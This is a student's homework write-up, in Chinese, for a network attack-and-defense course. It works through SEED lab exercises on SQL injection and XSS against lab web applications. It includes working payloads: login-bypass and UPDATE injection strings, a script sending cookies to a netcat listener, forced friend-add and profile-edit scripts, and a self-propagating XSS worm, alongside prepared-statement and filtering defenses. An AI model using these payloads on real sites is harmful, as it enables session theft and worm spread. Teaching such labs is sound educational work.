20199112 2019-2020-2 《网络攻防实践》第 11 周作业
学习总结及实践内容
Web 应用体系结构
应用程序有两种模式:C/S、B/S。
C/S 是客户端/服务器端程序,也就是说这类程序一般独立运行。而 B/S 就是浏览器端/服务器端应用程序,这类应用程序一般借助浏览器来运行。WEB 应用程序一般是 B/S 模式。Web 应用程序首先是“应用程序”,和用标准的程序语言,如 C、C++ 等编写出来的程序没有什么本质上的不同。然而 Web 应用程序又有自己独特的地方,就是它是基于 Web 的,而不是采用传统方法运行的。换句话说,它是典型的浏览器/服务器架构的产物。
一个 Web 应用程序是由完成特定任务的各种 Web 组件(web components)构成的并通过 Web 将服务展示给外界。在实际应用中,We b应用程序是由多个 Servlet、JSP 页面、HTML 文件以及图像文件等组成。所有这些组件相互协调为用户提供一组完整的服务。
Web 应用安全威胁
-
针对浏览器和终端用户的 Web 浏览安全威胁;
-
针对传输网络的网络协议安全威胁;
-
系统层安全威胁;
-
Web 服务器软件安全威胁;
-
Web 应用程序安全威胁;
-
Web 数据安全威胁。
攻击 Web 服务器软件
Web 服务器软件作为 Web 应用的承载体,也成为攻击者对 Web 应用实施攻击的首要目标之一。
针对 Web 服务器软件包的渗透攻击仍然存在,Web 服务器平台中的安全漏洞主要分为如下几大类。
-
数据驱动的远程代码执行安全漏洞:作为一种典型的网络服务守护进程,Web 服务器软件包也面临着缓冲区溢出、不安全指针、格式化字符串等一系列数据驱动安全漏洞的远程渗透攻击,这类攻击往往能够让攻击者在 Web 服务器上直接获得远程代码执行的权力,并以相当高的权限执行任意命令。
-
服务器功能扩展模块漏洞:Web 服务器软件通过一些功能扩展模块来为核心的 HTTP 引擎增加其他的功能,启动包括动态代码执行(如微软的 ASP)、站点检索(如 IIS 的索引服务)、Web 分布式写作与版本管理协议 WebDAV、SSL 加密协议等。这些扩展模块往往较 Web 服务器软件的编写质量要差许多,因此也就存在更多的安全漏洞。
-
样本文件安全漏洞:为了让更多人接受和依赖他们的技术,Web 服务器软件厂商经常在他们的软件包中包含样本文件和代码示例来演示自己平台一些新奇的用法。一旦这些样本文件存在安全漏洞,就使得攻击者可以利用这些默认包含的样本文件来对 Web 服务器实施攻击。
-
源代码泄露:源代码泄露漏洞让渗透测试人员能够查看到没有防护措施 Web 服务器上的应用程序源代码,在特定情况下,攻击者甚至可以利用这些漏洞查看到系统级的文件。
-
资源解析攻击:Web 服务器软件在处理资源请求时,需要将同一资源的不同表示方式解析为标准化名称,这一过程被称为资源解析。一些 Web 服务器软件可能在资源解析过程中遗漏一些输入合法性与合理性验证的处理,从而就可能导致目录遍历、敏感信息泄露、甚至代码注入攻击。
攻击 Web 数据内容
Web 站点除了通过服务器软件和应用程序中存在安全漏洞和弱点遭受攻击之外,还面临着针对敏感数据内容的攻击威胁,具体包括安全敏感数据泄露、网站内容遭受篡改,以及不良信息内容上传。
-
安全敏感数据泄露;
-
网站篡改;
-
不良信息内容上传。
Web 应用安全防范措施
-
Web 站点网络传输安全设防措施:尽量使用 HTTPS 协议来保障 Web 站点传输时的保密性、完整性与身份真实性;通过加密的连接通道来管理 Web 站点,避免使用未经加密的 telnet、FTP、HTTP 来进行 Web 后台管理,而使用 SSH、SFTP 等安全协议;对关键的 Web 服务器,设置静态绑定 MAC-IP 映射,在服务网段内进行 ARP 等各类欺骗攻击的检测与 MAC 封禁机制。
-
Web 站点操作系统及服务安全设防措施:对 Web 站点的操作系统与服务器软件进行及时的补丁更新;对 Web 站点服务器的橾作系统及各种开放服务进行远程安全漏洞扫描;采用提升系统与服务安全性的一般性设防措施,包括关闭所有不使用的服务,避免使用明文传输的网络服务;设置强口令字,以及安全的服务配置:部署防火墙,设置对控制及内容上传通道的限制访问;配置数据备份服务,必要时设置冗余和双机热备机制。
-
Web 应用程序安全设防措施:应该认识到采用动态内容、支持用户输入的 Web 应用程序较静态 HTML 具有更高的安全风险;对于必须提供用户交互、采用动态页而的 Web 站点,尽量使用具有良好安全声誉及稳定技术支持力量的 Web 应用软件包;只在必要时候自主或外包开发 Web 应用程序;使用 Web 服务器软件提供的日志功能,对 Web 应用程序的所有访问请求进行日志记录与安全审计。
-
Web 站点数据安全设防措施:提商网站内容维护人员的数据安全意识;对维护网站的数据安全实施日常监测和防护。
SQL 注入
代码注入是针对 Web 应用程序的上流攻击技术之一,代码注入根据攻击目标的不同又分为:
- 恶意读取、修改与操纵数据库的 SQL 注入攻击;
- 在 Web 服务器端安装、执行 Webshell 等恶意脚本的 PHP 注入或 ASP 注入攻击;
- 在 Web 服务器端恶意执行操作系统命令的 Shell 注入攻击;
- 其他多种多样的注入攻击,如 LDAP 注入、邮件命令注入、空字节注入、SSI 注入、XPath 注入、XML 注入、XQuery 注入等。
SQL 注入(SQLi)是一种注入攻击,可以执行恶意 SQL 语句。它通过将任意 SQL 代码插入数据库查询,使攻击者能够完全控制 Web 应用程序后面的数据库服务器。攻击者可以使用 SQL 注入漏洞绕过应用程序安全措施;可以绕过网页或 Web 应用程序的身份验证和授权,并检索整个 SQL 数据库的内容;还可以使用 SQL 注入来添加,修改和删除数据库中的记录。
SQL 注入漏洞可能会影响使用 SQL 数据库(如 MySQL,Oracle,SQL Server 或其他)的任何网站或 Web 应用程序。犯罪分子可能会利用它来未经授权访问用户的敏感数据:客户信息,个人数据,商业机密,知识产权等。SQL 注入攻击是最古老,最流行,最危险的 Web 应用程序漏洞之一。
SQL 注入攻击防范措施
- 使用类型安全(type-safe)的参数编码机制;
- 凡是来自外部的用户输入,必须进行完备检查;
- 将动态 SQL 语句替换为存储过程、预编译 SQL 或 ADO 命令对象;
- 加强 SQL 数据库服务器的配置与连接。
XSS 攻击技术原理
与代码注入类似,XSS 攻击的根源同样是 Web 应用程序对用户输入内容的安全验证与过滤不够完善,在许多流行的 Web 论坛、博客、留言本及其他允许用户交互的 Web 应用程序中,用户提交内容中可以包含 HTML、JavaScript 及其他脚本代码,而一旦 Web 应用程序没有对这些输入的合法性进行有效检查与过滤,就很有可能让这些恶意代码逻辑包含在服务器动态产生或更新的网页中。
而与代码注入不同的是,XSS 攻击的最终攻击目标并非 Web 服务器,Web 服务器上的应用程序在 XSS 攻击场景中发挥的角色是“帮凶”,而非“受害者”,真正的“受害者”则是访问这些 Web 服务器的其他用户。
课外实践作业一:SQL 注入实验
我们已经创建了一个 Web 应用程序,并将其托管在 www.SEEDLabSQLInjection.com 。该 Web 应用程序是一个简单的员工管理应用程序。员工可以通过此 Web 应用程序查看和更新数据库中的个人信息。此 Web 应用程序主要有两个角色:管理员是特权角色,可以管理每个员工的个人资料信息。员工是一般角色,可以查看或更新自己的个人资料信息。完成以下任务:
- 熟悉 SQL 语句: 我们已经创建了一个名为 Users 的数据库,其中包含一个名为 creditential 的表。该表存储了每个员工的个人信息(例如,eid,密码,薪水,ssn 等)。在此任务中,您需要使用数据库来熟悉 SQL 查询。
- 对 SELECT 语句的 SQL 注入攻击:上述 Web 应用存在 SQL 输入漏洞,任务是在不知道密码的情况下登陆该 Web 应用程序。
- 对 UPDATE 语句的 SQL 注入攻击:通过员工的更新个人界面实施 UPDATE 语句的 SQL 注入攻击。
- SQL 对抗,修复上述 SQL 注入攻击漏洞。
实验环境:
熟悉 SQL 语句
首先登录 MySQL 数据库:
mysql -u root -pseedubuntu
使用系统创建好的 Users 数据库:(注意语句结束符分号)
use Users;
查看该数据库下所有的表:
show tables;
可以看到该数据库存在一个名为“credential”的表。
下面使用查询语句,查看这个表的详细信息:
select * from credential;
对 SELECT 语句的 SQL 注入攻击
首先使用 SEED 访问已经搭建好的 Web 页面:www.SEEDLabSQLInjection.com
可以看到是这样的一个登录界面:
以 SEED 实验环境自带的火狐浏览器为例,使用快捷键ctrl+U查看该页面源码。
注意查看<form>表单标签下的具体内容:
<form action="unsafe_home.php" method="get">
<div class="input-group mb-3 text-center">
<div class="input-group-prepend">
<span class="input-group-text" id="uname">USERNAME</span>
</div>
<input type="text" class="form-control" placeholder="Username" name="username" aria-label="Username" aria-describedby="uname">
</div>
<div class="input-group mb-3">
<div class="input-group-prepend">
<span class="input-group-text" id="pwd">PASSWORD </span>
</div>
<input type="password" class="form-control" placeholder="Password" name="Password" aria-label="Username" aria-describedby="pwd">
</div>
<br>
<button type="submit" class="button btn-success btn-lg btn-block">Login</button>
</form>
上述代码逻辑表示:用户点击提交后,表单将用户输入的信息使用get方法提交至unsafe_home.php页面进行权限校验。
接下来进入/var/www/SQLInjection/目录分析一下上述 php 页面。
function drawLayout($id,$name,$eid,$salary,$birth,$ssn,$pwd,$nickname,$email,$address,$phoneNumber){
if($id!=""){
session_start();
$_SESSION['id'] = $id;
$_SESSION['eid'] = $eid;
$_SESSION['name'] = $name;
$_SESSION['pwd'] = $pwd;
}else{
echo "can not assign session";
}
if ($name !="Admin") {
// If the user is a normal user.
...
}
else {
// if user is admin.
...
}
}
从上述代码可以看出存在一个Admin用户,并且对应的页面逻辑是不一样的。
下面重点观察一下 php 文件中查询语句:
$sql = "SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password
FROM credential
WHERE name= '$input_uname' and Password='$hashed_pwd'";
其中where部分存在可以进行注入攻击的漏洞。利用注释特性,当变量$input_uname为Admin' #时,where部分变成了:
WHERE name= 'Admin' #' and Password='$hashed_pwd'
实际上,#后面的语句都被注释掉了,那么where部分就变成:
WHERE name= 'Admin'
这样的话,就可以绕过密码校验,直接进入Admin用户页面。
测试输入用户名为Admin' #,密码为空:
登录成功:
对 UPDATE 语句的 SQL 注入攻击
首先利用前面的漏洞,用Alice' #登录,可以看到对应的信息:
然后点击页面上方的Edit Profile进入更新信息页面:
查看源码。
可知涉及到 UPDATE 语句的页面应该是unsafe_edit_backend.php,找到 SQL 语句:
$sql = "UPDATE credential SET nickname='$input_nickname',email='$input_email',address='$input_address',Password='$hashed_pwd',PhoneNumber='$input_phonenumber' where ID=$id;";
显然,上述SET语句不能对个人工资进行更新修改,同时由上文可以知道 Alice 的编号是 10000,变量$input_nickname对应的就是用户输入的 NickName。
如果用户在 NickName 文本框中输入:
', salary='12345' where EID='10000';#
那么变量$input_nickname则发生相应改变。
于是,上面的语句变为:
$sql = "UPDATE credential SET nickname='', salary='12345' where EID='10000';#',email='$input_email',address='$input_address',Password='$hashed_pwd',PhoneNumber='$input_phonenumber' where ID=$id;";
除去被#注释的内容后:
$sql = "UPDATE credential SET nickname='', salary='12345' where EID='10000';
这条语句就实现了将 Alice 的工资更新为 12345.
测试:
修改成功:
SQL 对抗,修复上述 SQL 注入攻击漏洞
可以使用预处理语句避免上述注入攻击的实现。
首先在unsafe_home.php页面中,对SELECT语句进行预处理。
原来的语句:
$sql = "SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password
FROM credential
WHERE name= '$input_uname' and Password='$hashed_pwd'";
修改为(使用了绑定参数的办法):
$sql = $conn->prepare("SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password FROM credential WHERE name= ? and Password= ?");
$sql->bind_param("ss", $input_uname, $hashed_pwd);
接着,在unsafe_edit_backend.php页面中,对UPDATE语句进行预处理。
原来的语句:
$sql = "UPDATE credential SET nickname='$input_nickname',email='$input_email',address='$input_address',PhoneNumber='$input_phonenumber' where ID=$id;";
修改为:
$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,PhoneNumber=? where ID=$id;");
$sql->bind_param("ssss", $input_nickname, $input_email,$input_address, $input_phonenumber);
课外实践作业二:XSS 攻击实验
为了演示攻击者可以利用 XSS 漏洞做什么,我们在预先构建的 Ubuntu VM 映像中设置了一个名为 Elgg 的 Web 应用程序。在本实验中,学生需要利用此漏洞对经过修改的 Elgg 发起 XSS 攻击,攻击的最终目的是在用户之间传播 XSS 蠕虫,这样,无论是谁查看的受感染用户个人资料都将被感染。
- 发布恶意消息,显示警报窗口:在您的 Elgg 配置文件中嵌入一个 JavaScript 程序,以便当另一个用户查看您的配置文件时,将执行 JavaScript 程序并显示一个警报窗口。
- 弹窗显示 cookie 信息:将 cookie 信息显示。
- 窃取受害者的 cookies:将 cookie 发送给攻击者。
- 成为受害者的朋友:使用 js 程序加受害者为朋友,无需受害者干预,使用相关的工具了解 Elgg 加好友的过程。
- 修改受害者的信息:使用 js 程序使得受害者在访问 Alice 的页面时,资料无需干预却被修改。
- 编写 XSS 蠕虫。
- 对抗 XSS 攻击。
发布恶意消息,显示警报窗口
访问实验环境已搭建好的 Web 网站:http://www.xsslabelgg.com,使用 Alice 的账户进行登录,用户名为 alice,密码为 seedalice,然后进入个人信息页面http://www.xsslabelgg.com/profile/alice,点击Edit profile,接着在下面的Brief description文本框输入以下 JS 语句:
<script>alert('xss');</script>
点击Save保存,页面弹出如下的提示框:
刷新页面,再次弹出上述提示框。
这就实现了通过嵌入 JS 代码,弹出警报窗口的功能。
弹窗显示 cookie 信息
步骤同上文,在Brief description文本框输入以下 JS 语句并保存:
<script>alert(document.cookie);</script>
弹出提示框,并且显示当前的 cookie 信息。
窃取受害者的 cookies
可以考虑使用 JS 脚本动态地在页面添加一个<img>标签,同时在<img>标签的src属性中嵌入攻击代码。
下面的攻击代码实现了将 cookies 发送到攻击者的 5555 端口,若攻击者的 TCP server 监听该端口端口,服务器就可以输出收到的内容。
<script>
document.write('<img src=http://127.0.0.1:5555?c=' + escape(document.cookie) + '>');
</script>
上面的document.write()JavaScript 函数提供了可以对浏览器 DOM 结构进行操作的 API 接口。
escape()函数表示对对字符串进行编码。
将上述代码同样输入到Brief description文本框中,然后在终端使用以下指令监听端口:
nc -l 5555 -v
然后保存文本框输入的内容,终端就可以监听到浏览器发送的具体内容了:
成为受害者的朋友
假设当前登录用户为 Alice,然后访问用户 Boby 的主页:http://www.xsslabelgg.com/profile/boby
首先使用快捷键ctrl+shift+E打开火狐浏览器开发者模式中的 Network 页面,然后点击左侧的Add friend,添加 Boby 为好友。
可以看到此时浏览器发送的 POST 请求的具体内容:
其中请求的地址是:
http://www.xsslabelgg.com/action/friends/add?friend=45&__elgg_ts=1589264053&__elgg_token=v-5SQNXrM_NGAKG0TFtXWQ
显然,这里用到了三个参数,friend=、__elgg_ts、__elgg_token,分别是好友、时间、身份认证;而请求的地址是http://www.xsslabelgg.com/action/friends/add
于是,可以构造下面的 JS 脚本,用于添加其他好友。
<script type="text/javascript">
window.onload = function () {
var Ajax = null;
var ts = "&__elgg_ts=" + elgg.security.token.__elgg_ts;
var token = "&__elgg_token=" + elgg.security.token.__elgg_token;
var sendurl = "http://www.xsslabelgg.com/action/friends/add?friend=44" + ts + token;
//发送 Ajax 请求
Ajax = new XMLHttpRequest();
Ajax.open("GET", sendurl, true);
Ajax.setRequestHeader("Host", "www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
Ajax.send();
}
</script>
将上面的脚本放在 Alice 的About me文本框内,注意文本框选择Edit HTML模式,保存。
然后退出 Alice,登录 Boby 访问 Alice 主页:http://www.xsslabelgg.com/profile/alice,返回 Boby 主页,看到已经成功添加 Alice 为好友。
修改受害者的信息
同上一问一样,在进入Edit profile页面后,点击Save后,可以看到具体的 Network 请求信息。
得到了对应的请求地址和参数等信息。
构造以下脚本,用于在 Boby 访问 Alice 时,修改 Boby 的个人资料。
<script type="text/javascript">
window.onload = function(){
var userName=elgg.session.user.name;
var guid="&guid="+elgg.session.user.guid;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;
var content= token + ts + "name=" + userName + "&description=<p>this had been changed by xss attack.</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
alert(content)
//FILL IN
var samyGuid=44;
//FILL IN
if(elgg.session.user.guid!=samyGuid)
{
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
Ajax.send(content);
}
}
</script>
接下来进行测试,退出 Alice,登录 Boby,这是 Boby 个人资料的原始状态。
访问 Alice,再返回 Boby,看到:
攻击成功。
编写 XSS 蠕虫
这里参考了大佬博客里的 DOM API 方法。
为了实现蠕虫感染,可以将下面这段代码在不同的用户之间感染传播:
<script id="worm" type="text/javascript">
window.onload = function(){
var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
var jsCode = document.getElementById("worm").innerHTML;
var tailTag = "</" + "script>";
var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);
var userName=elgg.session.user.name;
var guid="&guid="+elgg.session.user.guid;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;
//Construct the content of your url.
var content= token + ts + "&name=" + userName + "&description=<p>this page had been changed by xss attack "+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
alert(content)
var samyGuid=44;
if(elgg.session.user.guid!=samyGuid){
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
Ajax.send(content);
}
}
</script>
和之前一样,将代码放在 Alice 的About me文本框内,保存。
用 Boby 访问 Alice,然后返回 Boby,则 Boby 被感染。
退出 Boby,使用 Samy 访问 Boby,则 Samy 被感染。
至此,实现了蠕虫传染。
对抗 XSS 攻击
在用户输入文本逻辑那里,编写禁用 JavaScript 渲染的功能即可避免此类攻击;也可以使用 Elgg 提供的安全插件 HTMLawed 过滤用户输入的标签。
学习中遇到的问题及解决
Q:PHP 连接数据库的方法记不清了
A:查阅 php 文档,翻阅以前写的 Mysqli demo,复习了一下
总结
现在 Web 开发已经成为主流,真实业务中已经有很成熟的对抗 Web 攻击的体系框架,现在较为热门的前后端开发框架已经具备了足够的安全性。就本次实践而言,更注重攻击过程的理解,学会原理就足够了,想要真正对成熟的 Web 框架构成攻击,还是要下功夫的。
